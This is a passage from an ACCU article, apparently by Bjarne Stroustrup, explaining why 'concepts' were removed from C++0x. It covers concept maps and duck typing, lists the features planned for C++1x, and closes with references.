- Should a type X that provides a member operation X::begin() be considered a match for a 'concept' C<T> that requires a function begin(T), or should a user supply a 'concept' map from T to C? An example is std::vector and std::Range. (My answer: it should match.)

The 'status quo before Frankfurt' answers all differ from my suggestions. Obviously, I have had to simplify my explanation here and omit most details and most rationale.

I cannot reenact the whole technical discussion here, but this is my conclusion: in the 'status quo' design, 'concept' maps are used for two things:

- to map types to 'concepts' by adding/mapping attributes, and
- to assert that a type matches a 'concept'.

Somehow, the latter came to be seen as an essential function by some people, rather than an unfortunate rare necessity. When two 'concepts' differ semantically, what is needed is not an assertion that a type meets one and not the other 'concept' (this is, at best, a workaround - an indirect and elaborate attack on the fundamental problem), but an assertion that a type has the semantics of the one and not the other 'concept' (fulfills the axiom(s) of the one and not the other 'concept').

For example, the STL input iterator and forward iterator have a key semantic difference: you can traverse a sequence defined by forward iterators twice, but not a sequence defined by input iterators; e.g., applying a multi-pass algorithm to an input stream is not a good idea. The solution in 'status quo' is to force every user to say what types match a forward iterator and what types match an input iterator. My suggested solution adds up to: if (and only if) you want to use semantics that are not common to two 'concepts' and the compiler cannot deduce which 'concept' is a better match for your type, you have to say which semantics your type supplies; e.g., 'my type supports multi-pass semantics'. One might say, 'When all you have is a 'concept' map, everything looks like needing a type/'concept' assertion.'
At the Frankfurt meeting, I summarized:

Why do we want 'concepts'?

- To make requirements on types used as template arguments explicit
- Precise documentation
- Better error messages
- Overloading

Different people have different views and priorities. However, at this high level, there can be confusion - but little or no controversy. Every half-way reasonable 'concept' design offers that.

What concerns do people have?

- Programmability
- Complexity of formal specification
- Compile time
- Run time

My personal concerns focus on 'programmability' (ease of use, generality, teachability, scalability); the complexity of the formal specification (40 pages of standards text) is secondary. Others worry about compile time and run time. However, I think the experimental implementation (ConceptGCC [Gregor06b]) shows that run time for constrained templates (using 'concepts') can be made as good as or better than that of current unconstrained templates. ConceptGCC is indeed very slow, but I don't consider that fundamental.

When it comes to validating an idea, we hit the traditional dilemma. With only minor oversimplification, the horns of the dilemma are:

- 'Don't standardize without commercial implementation'
- 'Major implementers do not implement without a standard'

Somehow, a detailed design and an experimental implementation have to become the basis for a compromise.

My principles for 'concepts' are:

- Duck typing - the key to the success of templates for GP (compared to OO with interfaces and more).
- Substitutability - never call a function with a stronger precondition than is 'guaranteed'.
- 'Accidental match' is a minor problem - not in the top 100 problems.

My 'minimal fixes' to 'concepts' as present in the pre-Frankfurt working paper were:

- 'Concepts' are implicit/auto - to make duck typing the rule.
- Explicit refinement - to handle substitutability problems.
- General scoping of 'concept' maps - to minimize 'implementation leakage'.
- Simple type/'concept' matching - to make vector a range without a redundant 'concept' map.

For details, see [stroustrup09].

No C++0x, long live C++1x

Even after cutting 'concepts', the next C++ standard may be delayed. Sadly, there will be no C++0x (unless you count the minor corrections in C++03). We must wait for C++1x, and hope that 'x' will be a low digit. There is hope because C++1x is now feature complete (excepting the possibility of some national standards bodies effectively insisting on some feature present in the formal proposal for the standard). 'All' that is left is the massive work of resolving outstanding technical issues and comments.

A list of features and some discussion can be found on my C++0x FAQ [FAQ]. Here is a subset:

- atomic operations
- auto (type deduction from initializer)
- C99 features
- enum class (scoped and strongly typed enums)
- constant expressions (generalized and guaranteed; constexpr)
- defaulted and deleted functions (control of defaults)
- delegating constructors
- in-class member initializers
- inherited constructors
- initializer lists (uniform and general initialization)
- lambdas
- memory model
- move semantics; see rvalue references
- null pointer (nullptr)
- range for statement
- raw string literals
- template alias
- thread-local storage (thread_local)
- unicode characters
- uniform initialization syntax and semantics
- user-defined literals
- variadic templates

and libraries:

- improvements to algorithms
- containers
- duration and time_point
- function and bind
- forward_list, a singly-linked list
- future and promise
- garbage collection ABI
- hash_tables; see unordered_map
- metaprogramming and type traits
- random number generators
- regex, a regular expression library
- scoped allocators
- smart pointers; see shared_ptr, weak_ptr, and unique_ptr
- threads
- atomic operations
- tuple

Even without 'concepts', C++1x will be a massive improvement on C++98, especially when you consider that these features (and more) are designed to interoperate for maximum expressiveness and flexibility.
I hope we will see 'concepts' in a revision of C++ in maybe five years. Maybe we could call that C++1y or even 'C++y!'

References

[FAQ] Bjarne Stroustrup, 'C++0x - the next ISO C++ standard' (FAQ), available from: C++11 FAQ
[Frankfurt09] 'Working Draft, Standard for Programming Language C++', a pre-Frankfurt working paper, June 2009, available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2914.pdf
[Gregor06a] Douglas Gregor and Bjarne Stroustrup, June 2006, 'Concepts', available from: http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2006/n2042.pdf
[Gregor06b] Douglas Gregor, Jaakko Jarvi, Jeremy Siek, Bjarne Stroustrup, Gabriel Dos Reis and Andrew Lumsdaine, October 2006, 'Concepts: Linguistic support for generic programming in C++', available from: http://www.research.att.com/~bs/oopsla06.pdf
[HOPL] Proceedings of the History of Programming Languages conference 2007, available from: http://portal.acm.org/toc.cfm?id=1238844
[iSO] The C++ Standards Committee - ISO/IEC JTC1/SC22/WG21
[Reis06] Gabriel Dos Reis and Bjarne Stroustrup, January 2006, 'Specifying C++ concepts', available from: http://www.research.att.com/~bs/popl06.pdf
[siek05] Jeremy Siek, Douglas Gregor, Ronald Garcia, Jeremiah Willcock, Jaakko Jarvi and Andrew Lumsdaine, May 2005, 'Concepts for C++0x', available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1758.pdf
[stroustrup03a] Bjarne Stroustrup and Gabriel Dos Reis, October 2003, 'Concepts - Design choices for template argument checking', available from: http://www.research.att.com/~bs/N1522-concept-criteria.pdf
[stroustrup03b] Bjarne Stroustrup, October 2003, 'Concept checking - A more abstract complement to type checking', available from: http://www.research.att.com/~bs/n1510-concept-checking.pdf
[stroustrup05] Bjarne Stroustrup and Gabriel Dos Reis, April 2005, 'A concept design (Rev. 1)', available from: http://www.research.att.com/~bs/n1782-concepts-1.pdf
[stroustrup07] Bjarne Stroustrup, May 2007, 'Evolving a language in and for the real world: C++ 1991-2006', available from: http://www.research.att.com/~bs/hopl-almost-final.pdf
[stroustrup09] Bjarne Stroustrup, 'Simplifying the use of concepts', available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2906.pdf

--------------------------------------------------------------------
Source: ACCU :: No 'Concepts' in C++0x